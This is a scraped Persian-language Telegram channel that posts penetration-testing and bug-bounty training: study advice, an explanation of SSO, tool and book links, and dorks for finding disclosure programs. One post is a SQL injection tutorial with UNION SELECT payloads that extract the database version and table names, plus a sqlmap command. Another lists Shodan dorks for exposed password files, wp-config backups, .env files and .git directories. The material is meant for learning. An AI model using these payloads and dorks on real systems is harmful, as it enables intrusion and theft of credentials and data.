Security hint
4.5K subscribers
75 photos
2 videos
18 files
187 links
🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint
Download Telegram
اگه هنوز عضو گروهمون نشدید از لینک زیر بیا داخل:
https://t.me/Sec_Hint_chat
🐢نکات طلایی قبل شروع مسیر:

🔹 قدم به قدم و با صبر پیش بروید: مسیر یادگیری تست نفوذ طولانیه و پر از چالش‌هایی که ممکنه دلسردتون کنه، ولی هر شکست یه فرصت یادگیریه. مثل حل معما، با پشتکار به پاسخ خواهید رسید.

🔹 قدرت خودآموزی رو فراموش نکنید: تو این حرفه، دانش همیشه در حال تغییر و به‌روزرسانیه. از دوره‌های آنلاین، کتاب‌ها، و منابع موجود استفاده کنید و از کنجکاوی خودتون برای کشف تهدیدات و تکنولوژی‌های جدید بهره ببرید.

🔹 متعهد به یادگیری عمیق باشید: سعی کنید هر موضوع رو به‌خوبی درک کنید و همیشه دنبال منابع جدید باشید. تسلط عمیق به مباحث امنیتی و شبکه، شما رو به یه متخصص قوی تبدیل می‌کنه.

🔹 اشتراک‌گذاری دانش و ارتباط با جامعه سایبری: به بقیه کمک کنید و فعالانه توی کنفرانس‌ها و انجمن‌ها شرکت کنید. این کار نه‌تنها دانش شما رو تثبیت می‌کنه، بلکه به پیشرفت کلی حوزه امنیت کمک می‌کنه.

🔹 دلیل و انگیزه داشته باشید: برای خودتون هدف تعیین کنید و به این فکر کنید که چرا می‌خواید این مسیر رو طی کنید. انگیزه‌های شخصی یا حرفه‌ای شما می‌تونه سوخت حرکت شما به سمت موفقیت باشه.

خلاصه اینکه: این مسیر پر از چالش و هیجانه، ولی وقتی که پشتکار، خودآموزی، و تعهد به یادگیری داشته باشید، می‌تونید به موفقیت‌های بزرگی در دنیای امنیت سایبری برسید!

#تست_نفوذ #شروع #roadmap

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
💯8👍2
🧞‍♂️اگر Bash براتون یه غوله، نمیدونید چطوری میشه اجرای اسکریپت هاتون رو برنامه ریزی کنید پیشنهاد میکنم ویدیو این هفته لینوکس رو از دست ندید 🤯

دیروز یه دور ضبط کردم و بخاطر برخی موارد امروز دوباره ضبط کردم و اپلودش کردم که براتون مفیدتر باشه


https://youtu.be/ROo9loUO3K8?si=hscE2MOLTKotSJdM

#YouTube #Linux

🌐Sec_Hint
14👍3🔥1
دوست دارید ویدیو هفته اینده در مورد چی باشه؟

پیشنیاز ها یا اسیب پذیری یا ... ؟!🙂‍↔️

توی کپشن برام بنویسید😉
👍7
🚀 ابزاری کاربردی LazyDork
🌐 به راحتی با دادن URL یک سایت، این ابزار دورک‌های آسیب‌پذیری مرتبط رو تولید می‌کنه تا بتونید در جمع‌آوری اطلاعات امنیتی مؤثر باشید.

ایده‌آل برای شروع اسکن‌های دورکینگ! 🕵️‍♂️💻

https://iamunixtz.github.io/LazyDork/

#Dork

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
9👍5🤩1
🔥 یک منبع فوق‌العاده برای یادگیری فازینگ با FFUF!

تک تک سوییچ هارو معرفی کرده و نمونه دستورات هم گذاشته که بتونید استفاده کنید.

🔗 یادگیری شروع کن: Fuzzing with FFUF

#FFUF

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍129
🚨سیستم احراز هویت یکپارچه یا (SSO) چیست ؟

🔥بخش_اول

🔐 در واقع  SSO  یک راهکار احراز هویتی امن است که به کاربران اجازه می دهد تنها با استفاده از یک مجموعه داده ای برای احراز هویت، هم بتوانند بدون اتلاف وقت و انرژی به سایت ها و اپلیکیشن های مختلف وارد شوند و همچنین از دردسر های فراموشی پسورد نیز پیشگیری شود.

💡و Single Sign On یا (SSO) یک راهکار احراز هویت است که به کاربران اجازه می‌دهد تنها با یک بار ورود به سیستم، به چندین سرویس، اپلیکیشن، یا وبسایت دسترسی پیدا کنند. در این روش، پس از وارد کردن یک نام کاربری و پسورد در ابتدا، کاربر نیازی به وارد کردن مجدد اطلاعات در هر مرحله و برای هر سرویس ندارد. SSO بر اساس ایجاد یک رابطه اعتماد بین ارائه‌دهنده هویت (مانند گوگل یا فیسبوک) و ارائه‌دهنده سرویس (مانند وبسایت‌ها یا اپلیکیشن‌ها) عمل می‌کند. این راهکار موجب صرفه‌جویی در وقت و کاهش فراموشی رمز عبور می‌شود.

در سیستم SSO، مکانیزم احراز هویت به گونه‌ای طراحی شده که از طریق گواهینامه‌ها و پروتکل‌های امنیتی، اطمینان حاصل می‌شود که هویت کاربر به طور ایمن به تمامی سرویس‌های مرتبط منتقل می‌شود. این سیستم امنیت را بهبود می‌بخشد، زیرا کاربران می‌توانند از پسوردهای قوی‌تر و پیچیده‌تر استفاده کنند، بدون اینکه نگران به‌خاطر سپردن چندین پسورد برای سرویس‌های مختلف باشند.

#SSO

📝Hreza

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍144
🔥 راهنمای سریع دستورات Bash 🌟

اگر با Bash کار می‌کنید، سایتDevhints یک مرجع فوق‌العاده است! 🎯 اینجا می‌توانید مهم‌ترین دستورات Bash، میانبرها، و نکات کلیدی را به ساده‌ترین شکل ممکن یاد بگیرید.

📌 ویژگی‌ها:
- نکات کاربردی برای اسکریپت‌نویسی.
- توضیحات مختصر و دقیق.
- مناسب برای مبتدی‌ها و حرفه‌ای‌ها.

💻 با Bash حرفه‌ای‌تر شوید و وقتتان را ذخیره کنید! 🚀

#Bash

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
7👍3
💡 کجا شروع کنیم؟

اگر تازه‌کارید، از سایت‌هایی که فقط برنامه‌های اطلاع‌رسانی آسیب‌پذیری (VDP) دارند، شروع کنید—برنامه‌هایی که به‌جای پاداش نقدی، فقط از شما قدردانی می‌کنند. چون هکرهای حرفه‌ای معمولاً وقتشان را روی این سایت‌ها نمی‌گذارند، فرصت خوبی برای شماست.

📌 برای پیدا کردن این سایت‌ها از Google Dorks استفاده کنید:
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
responsible disclosure hall of fame
responsible disclosure europe
responsible disclosure white hat
white hat program
insite:"responsible disclosure" -inurl:nl
intext responsible disclosure
site eu responsible disclosure
site .nl responsible disclosure
site responsible disclosure
responsible disclosure:sites
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"powered by hackerone" "submit vulnerability report"
"submit vulnerability report"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
intext:Vulnerability Disclosure site:nl
intext:Vulnerability Disclosure site:eu
site:*.*.nl intext:security report reward
site:*.*.nl intext:responsible disclosure reward
"security vulnerability" "report"
inurl"security report"
"responsible disclosure" university
inurl:/responsible-disclosure/ university
buy bitcoins "bug bounty"
inurl:/security ext:txt "contact"
"powered by synack"
intext:responsible disclosure bounty
inurl: private bugbountyprogram
inurl:/.well-known/security ext:txt
inurl:/.well-known/security ext:txt intext:hackerone
inurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbounty
inurl:reporting-security-issues
inurl:security-policy.txt ext:txt
site:*.*.* inurl:bug inurl:bounty
site:help.*.* inurl:bounty
site:support.*.* intext:security report reward
intext:security report monetary inurl:security
intext:security report reward inurl:report
site:security.*.* inurl: bounty
site:*.*.de inurl:bug inurl:bounty
site:*.*.uk intext:security report reward
site:*.*.cn intext:security report reward
"vulnerability reporting policy"
"van de melding met een minimum van een" -site:responsibledisclosure.nl
inurl : /bitcon bug bounty
inurl : btc security rewards


اکنون که هدف خود را انتخاب کرده‌اید، مطمئن شوید که وب‌سایتی را انتخاب کرده‌اید که 5 تا 6 صفحه در عمق نتایج جستجوی Google ظاهر می‌شود،شاید شانس بیشتری برای کشف باگ داشته باشید.


#Dorks

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
24👍5
بعد یه مدت یه پست گذاشتم اونم طولانی والبته پر اهمیت کانال تو شکه ویا شاید شما ⁉️⁉️⁉️
😂😂
👌84👻3👍2🤣2
🎯 چرا ' در Sql Injection نتیجه نمی‌دهد؟

ممکن است دلایل زیر مانع از نمایش نتیجه شوند:

خطاها در سمت سرور نمایش داده نمی‌شوند (Error Handling فعال است).
ورودی فیلتر شده و از بروز خطای SQL جلوگیری می‌شود.
تزریق در پارامتر اشتباه انجام شده است.

1- تست Blind SQL Injection:

🔹 اگر خروجی مشخصی نمی‌بینید، ممکن است با Blind SQL Injection مواجه باشید. از این روش‌ها استفاده کنید:
الف. Boolean-Based Injection:
?id=1 AND 1=1 -- (خروجی باید بدون تغییر باشد)
?id=1 AND 1=2 -- (خروجی باید تغییر کند یا صفحه خطا دهد)

ب. Time-Based Injection:
?id=1 AND SLEEP(5) -- (صفحه باید با تأخیر بارگذاری شود)


2- شناسایی ستون‌ها با UNION
تعداد ستون‌ها را با ORDER BY شناسایی کنید:
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--

وقتی به خطا رسیدید، تعداد ستون‌ها یک عدد کمتر از مقدار تست‌شده است.

بعد از شناسایی تعداد ستون‌ها، از UNION SELECT استفاده کنید:
?id=1 UNION SELECT 1,2,3,4--

3- پیدا کردن ستون‌های قابل مشاهده

🔹 برای پیدا کردن ستون‌هایی که خروجی آن‌ها در صفحه نمایش داده می‌شود:
?id=1 UNION SELECT 1,'test',3,4--

🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است.
4- استخراج اطلاعات حساس

نسخه پایگاه داده:
?id=1 UNION SELECT 1,@@version,3,4--

?id=1 UNION SELECT 1,version(),3,4--


نام جداول موجود:
?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--


استفاده از ابزارهای خودکار

💻 ابزار Sqlmap به شما کمک می‌کند که به‌صورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید:
sqlmap -u "http://example.com/page.php?id=1" --dbs



#پنتست #SQLi #امنیت_سایبری #باگ_بانتی

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍143👎1
🔍 Bug Bounty Tips for Smart Hunters 🐞


#bugbounty #trip

🌐Sec_Hint
👌12👍2
Bug Bounty Beginner's.pdf
187.9 KB
🚄راهنمای خوبی هست اگر هنوز سر اینکه از چی بخونم، از کجا بخونم مشکل دارید....🤔🤔

#BugBounty #book

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍125
🤑Shodan Secrets | Hack Hidden Files Easily

🛑Default Directory Listing
http.html:"index of /"


🛑Backup Files
http.html:"index of /" http.html:"backup"


🛑Compressed Achives
http.html:"index of /" http.html:"tar.gz"


🛑Database Files
http.html:"index of /" http.html:"database"
http.html:"index of /" http.html:".sql"
http.html:"index of /" http.html:".db"
http.html:"index of /" http.html:"db_backup"
http.html:"index of /" http.html:"mysql.dump"
http.html:"index of /" http.html:".mdb"


🛑Configuration Files
http.html:"index of /" http.html:"config.xml"


🛑Wordpress Configuration Files
http.html:"index of /" http.html:"wp-config.php.txt"
http.html:"index of /" http.html:"wp-config.txt"
http.html:"index of /" http.html:"wp-config.php.bak"
http.html:"index of /" http.html:"wp-config.php.old"
http.html:"index of /" http.html:"wp-config.php.backup"
http.html:"index of /" http.html:"wp-config.php.zip"
http.html:"index of /" http.html:"wp-config.php.tar.gz"


🛑Passwords
http.html:"index of /" http.html:"pwd"
http.html:"index of /" http.html:"pass.txt"
http.html:"index of /" http.html:"password"
http.html:"index of /" http.html:"password.txt"
http.html:"index of /" http.html:"passwords.txt"
http.html:"index of /" http.html:"passwords.zip"


🛑Windows Server Config Files
http.html:"index of /" http.html:"web.config"


🛑Exposed Logs
http.html:"index of /" http.html:".log"
http.html:"index of /" http.html:"access.log"
http.html:"index of /" http.html:"error.log"
http.html:"index of /" http.html:"php_error.log"
http.html:"index of /" http.html:"debug.log"


🛑Configuration and Version Control Files
http.html:"index of /" http.html:".env"
http.html:"index of /" http.html:".svn"


🛑Git Repositories
http.html:"index of /" http.html:".git"
http.html:"index of /" http.html:"gitconfig"


📃 source

#shodan #Dorks

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍193🤣1
همه چی در یک خط 🤔

یک ریپازیتوری فوق‌العاده که مجموعه‌ای از One-Liners آماده رو ارائه می‌ده! با این دستورات کوتاه، می‌تونید subdomain‌ها رو جمع‌آوری کنید، آسیب‌پذیری‌ها رو شناسایی کنید، و کارهای دیگه‌ای که توی باگ‌بانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید.

🔗 لینک

#Github #BugBounty

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍133
Hacking APIs - Early Access.pdf
12.5 MB
📕معرفی دوتا کتاب عالی برای یادگیری Hacking API

فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست...

من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼‍♀️

شما کدوم رو خوندی و پیشنهاد میدید؟!

#API #hacking

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
17👍1
Gareth_Heyes_JavaScript_for_hackers_Learn_to_think_like_a_hacker.pdf
1.8 MB
اگر جاوااسکریپت رو در حد قابل قبولی بلدید میتونید از این فایل استفاده کنید و موارد مورد نیاز امنیت در جاوااسکریپت رو یاد بگیرید...
اگر چیزی از جاوااسکریپت نمیدونید بهتره با این فایل شروع نکنید.

#javascript

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
25👍10😁1👌1
برای روزایی ک شاید اینترنت نداشته باشید، عضو کانالش بشید و از منابع فارسیش استفاده کنید
کتاب های مهم رو ترجمه میکنه ...
@web_articles
👍8
Forwarded from 🕸 Articles
HTTP Host Header Attacks.pdf
2.9 MB
Author: zarvan
Language: Persian
Telegram channel: @web_articles
13👍1